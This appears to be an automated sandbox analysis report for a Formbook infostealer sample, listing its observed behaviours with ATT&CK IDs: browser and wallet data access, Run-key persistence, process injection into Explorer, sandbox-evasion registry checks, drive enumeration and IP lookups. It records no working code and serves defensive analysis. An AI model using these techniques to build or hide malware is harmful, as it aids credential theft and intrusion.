formbook | 6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

System Information Discovery

Processes:

qtKktsiKHVx_s5cgtM6J_oZ3.exek1oxhH2IlsZGv0BtFN8mrxCf.exeitNt_p6Dr9jhS5O_E2ws3fJg.exe8355747.exeOjO1XjmvyvOzFhCrdsLx7HZj.exe4143041.exe1451086.exe7011155.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	qtKktsiKHVx_s5cgtM6J_oZ3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k1oxhH2IlsZGv0BtFN8mrxCf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	itNt_p6Dr9jhS5O_E2ws3fJg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	itNt_p6Dr9jhS5O_E2ws3fJg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8355747.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	OjO1XjmvyvOzFhCrdsLx7HZj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	OjO1XjmvyvOzFhCrdsLx7HZj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4143041.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k1oxhH2IlsZGv0BtFN8mrxCf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4143041.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1451086.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7011155.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	qtKktsiKHVx_s5cgtM6J_oZ3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8355747.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1451086.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7011155.exe

Loads dropped DLL 64 IoCs

Processes:

setup_install.exeMon17bbf11fdb575d.tmprundll32.execmd.exeCalculator Installation.exeregsvr32.exerundll32.exesetup.exeregsvr32.exeaP0QyoZ9ZbAPrsQoV0wMtiQF.exezjEjCO8pi62KmCRpRMXWBlTs.tmpsetup.exerundll32.exemsiexec.exemsiexec.exeinstaller.exeCalculator.exerundll32.exeMsiExec.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exe

pid	process
2584	setup_install.exe
2584	setup_install.exe
2584	setup_install.exe
2584	setup_install.exe
2584	setup_install.exe
2944	Mon17bbf11fdb575d.tmp
5704	rundll32.exe
4052	cmd.exe
4052	cmd.exe
6244	Calculator Installation.exe
6244	Calculator Installation.exe
6244	Calculator Installation.exe
6244	Calculator Installation.exe
6244	Calculator Installation.exe
4052	cmd.exe
4052	cmd.exe
4052	cmd.exe
3324	regsvr32.exe
3324	regsvr32.exe
6628	rundll32.exe
4052	cmd.exe
4052	cmd.exe
3376	setup.exe
3376	setup.exe
1304	regsvr32.exe
1304	regsvr32.exe
5888	aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
5888	aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
3616	zjEjCO8pi62KmCRpRMXWBlTs.tmp
5888	aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
5888	aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
5888	aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
5864	setup.exe
5864	setup.exe
7152	rundll32.exe
3640	msiexec.exe
3640	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
40888	installer.exe
40888	installer.exe
3376	setup.exe
3376	setup.exe
6304	Calculator.exe
6304	Calculator.exe
6304	Calculator.exe
3376	setup.exe
40888	installer.exe
3376	setup.exe
6236	rundll32.exe
6244	Calculator Installation.exe
2608	MsiExec.exe
2608	MsiExec.exe
5864	setup.exe
5864	setup.exe
232	Calculator.exe
232	Calculator.exe
232	Calculator.exe
5864	setup.exe
4860	Calculator.exe
6264	Calculator.exe
5864	setup.exe
5888	aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
1520	Calculator.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

chkdsk.exemsedge.exe810816.exesetup.exesetup.exeDYbALA.exe

description	ioc	process
Key created	\Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	chkdsk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\GJWT9LKXJ = "C:\\Program Files (x86)\\Ilvolgj8p\\colorcpl6lwt3l.exe"	chkdsk.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	810816.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Jaqyrupyno.exe\""	DYbALA.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 9 IoCs

evasion trojan

System Information Discovery

Processes:

itNt_p6Dr9jhS5O_E2ws3fJg.exeOjO1XjmvyvOzFhCrdsLx7HZj.exe4143041.exe7011155.exejg1_1faf.exeqtKktsiKHVx_s5cgtM6J_oZ3.exe8355747.exek1oxhH2IlsZGv0BtFN8mrxCf.exe1451086.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	itNt_p6Dr9jhS5O_E2ws3fJg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	OjO1XjmvyvOzFhCrdsLx7HZj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4143041.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7011155.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg1_1faf.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qtKktsiKHVx_s5cgtM6J_oZ3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8355747.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k1oxhH2IlsZGv0BtFN8mrxCf.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1451086.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

installer.exemsiexec.exeinstaller.exemsiexec.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\Y:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

151 ipinfo.io
200 ipinfo.io
1 ipinfo.io
1 ip-api.com
45 ipinfo.io
46 ipinfo.io
59 ipinfo.io
150 ipinfo.io

flow	ioc
151	ipinfo.io
200	ipinfo.io
1	ipinfo.io
1	ip-api.com
45	ipinfo.io
46	ipinfo.io
59	ipinfo.io
150	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

8355747.exeitNt_p6Dr9jhS5O_E2ws3fJg.exe4143041.exek1oxhH2IlsZGv0BtFN8mrxCf.exeOjO1XjmvyvOzFhCrdsLx7HZj.exe1451086.exe7011155.exe

pid	process
5052	8355747.exe
5644	itNt_p6Dr9jhS5O_E2ws3fJg.exe
6024	4143041.exe
6036	k1oxhH2IlsZGv0BtFN8mrxCf.exe
5868	OjO1XjmvyvOzFhCrdsLx7HZj.exe
6848	1451086.exe
5404	7011155.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

Mon1727c156c4abcec.exeMon174a6c5f1664f.execd7hFkZpYeRMbWsNn4vCMlU3.exe2AdEKiwtmbqyhsj6CH0d8OOg.exeykl6gUZWo4dCf42Ongmp5gYO.exeqtKktsiKHVx_s5cgtM6J_oZ3.exemjrxJWpZu4fGg6_kV7Ki27HW.exefcjklk9IilNVu9j1EhTx7S2Q.exechkdsk.execonhost.exe

description	pid	process	target process
PID 3348 set thread context of 808	3348	Mon1727c156c4abcec.exe	Mon1727c156c4abcec.exe
PID 3528 set thread context of 2520	3528	Mon174a6c5f1664f.exe	Mon174a6c5f1664f.exe
PID 5532 set thread context of 3232	5532	cd7hFkZpYeRMbWsNn4vCMlU3.exe	Explorer.EXE
PID 5636 set thread context of 3232	5636	2AdEKiwtmbqyhsj6CH0d8OOg.exe	Explorer.EXE
PID 5488 set thread context of 2164	5488	ykl6gUZWo4dCf42Ongmp5gYO.exe	ykl6gUZWo4dCf42Ongmp5gYO.exe
PID 5836 set thread context of 5416	5836	qtKktsiKHVx_s5cgtM6J_oZ3.exe	AppLaunch.exe
PID 5504 set thread context of 2424	5504	mjrxJWpZu4fGg6_kV7Ki27HW.exe	mjrxJWpZu4fGg6_kV7Ki27HW.exe
PID 5464 set thread context of 5160	5464	fcjklk9IilNVu9j1EhTx7S2Q.exe	fcjklk9IilNVu9j1EhTx7S2Q.exe
PID 6016 set thread context of 3232	6016	chkdsk.exe	Explorer.EXE
PID 6452 set thread context of 2132	6452	conhost.exe	explorer.exe
PID 6016 set thread context of 2132	6016	chkdsk.exe	explorer.exe

Drops file in Program Files directory 16 IoCs

Processes:

chkdsk.exethIWfskL1vCjCzPbfOYQb_kK.exeDYbALA.exeexplorer.exeTxhAgmivL8nXh1WsCz8WWApf.exe7wymZY6JAhs0Yytu5UrodZ4g.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Ilvolgj8p\colorcpl6lwt3l.exe	chkdsk.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	thIWfskL1vCjCzPbfOYQb_kK.exe
File created	C:\Program Files\Windows Mail\BPXRIUMWPK\foldershare.exe.config	DYbALA.exe
File created	C:\Program Files\Windows Mail\BPXRIUMWPK\foldershare.exe	DYbALA.exe
File created	C:\Program Files (x86)\Microsoft.NET\Jaqyrupyno.exe.config	DYbALA.exe
File opened for modification	C:\Program Files (x86)\Ilvolgj8p\colorcpl6lwt3l.exe	explorer.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	TxhAgmivL8nXh1WsCz8WWApf.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	TxhAgmivL8nXh1WsCz8WWApf.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	TxhAgmivL8nXh1WsCz8WWApf.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	thIWfskL1vCjCzPbfOYQb_kK.exe
File opened for modification	C:\Program Files (x86)\Ilvolgj8p	explorer.exe
File created	C:\Program Files (x86)\Ilvolgj8p\colorcpl6lwt3l.exe	explorer.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	TxhAgmivL8nXh1WsCz8WWApf.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	7wymZY6JAhs0Yytu5UrodZ4g.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	7wymZY6JAhs0Yytu5UrodZ4g.exe
File created	C:\Program Files (x86)\Microsoft.NET\Jaqyrupyno.exe	DYbALA.exe

Drops file in Windows directory 54 IoCs

Processes:

msiexec.exemsiexec.exeMsiExec.exeMsiExec.exe

description	ioc	process
File created	C:\Windows\SystemTemp\~DF77A2A09B11883B97.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEC02.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D20.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB1EC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\fb4a026.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DF8AE4DDD6B8F0311B.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5E7.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI86D7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F44.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI670E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7142.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB43F.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF0AD95303CB7CFC25.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6F8B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB026.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f775f2e.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICF6D.tmp	msiexec.exe
File created	C:\Windows\Tasks\AdvancedWindowsManager #1.job	MsiExec.exe
File created	C:\Windows\Installer\f775f2e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8530.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7BC6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID2AA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID451.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI728C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7339.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA566.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D5D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7F90.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI82AE.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF3243387D1BF0EDB8.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI983D.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC912.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID617.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB78C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB933.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7076.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICCCC.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIADC4.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFF4B759E0D04DA7B3.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFCA598AC837253E39.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\fb4a026.msi	msiexec.exe
File created	C:\Windows\Tasks\AdvancedWindowsManager #1.job	MsiExec.exe
File created	C:\Windows\SystemTemp\~DF540E042EA629EC77.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF49E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI71C0.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFD252C05B5EAD380D.TMP	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 25 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6128	5704	WerFault.exe	rundll32.exe
2724	4776	WerFault.exe	Mon17bffc2992eb3d.exe
1792	5472	WerFault.exe	1WfbS9cAfVpg_CC6_TRn2VH0.exe
5364	4244	WerFault.exe	Mon173a360b525.exe
2460	6628	WerFault.exe	rundll32.exe
4000	6600	WerFault.exe	chrome3.exe
2276	5968	WerFault.exe	5nuU3bgJ7h49V0zhwwOhIC6M.exe
6676	5520	WerFault.exe	VGwOG1Ej7n9HJz5cBUbWLZMJ.exe
5496	5924	WerFault.exe	caKnosJ4BSSeWUlq35ZBkYlA.exe
3468	5876	WerFault.exe	Soft1WW01.exe
400	5708	WerFault.exe	NaczrgoKg50UGIBMlCCFRRf6.exe
4900	5616	WerFault.exe	Y9q4umXmKpU5HwdORafbp7tB.exe
2660	5628	WerFault.exe	ol5YmV2wvAFgWhfLpI6sFGxV.exe
4004	5588	WerFault.exe	oAF1M64bSrKqv7RfA3esx606.exe
6932	6364	WerFault.exe	dpJunLr371JkufBb9Sa6IrgZ.exe
4844	2424	WerFault.exe	mjrxJWpZu4fGg6_kV7Ki27HW.exe
2152	5160	WerFault.exe	fcjklk9IilNVu9j1EhTx7S2Q.exe
6180	1588	WerFault.exe	fUoT72SvbR3Ga2dO5W4ARQMW.exe
5880	7152	WerFault.exe	rundll32.exe
6996	6236	WerFault.exe	rundll32.exe
1916	6484	WerFault.exe	GcleanerEU.exe
2332	6092	WerFault.exe	gcleaner.exe
29544	29400	WerFault.exe	rundll32.exe
29556	28800	WerFault.exe	GcleanerEU.exe
29672	28976	WerFault.exe	gcleaner.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
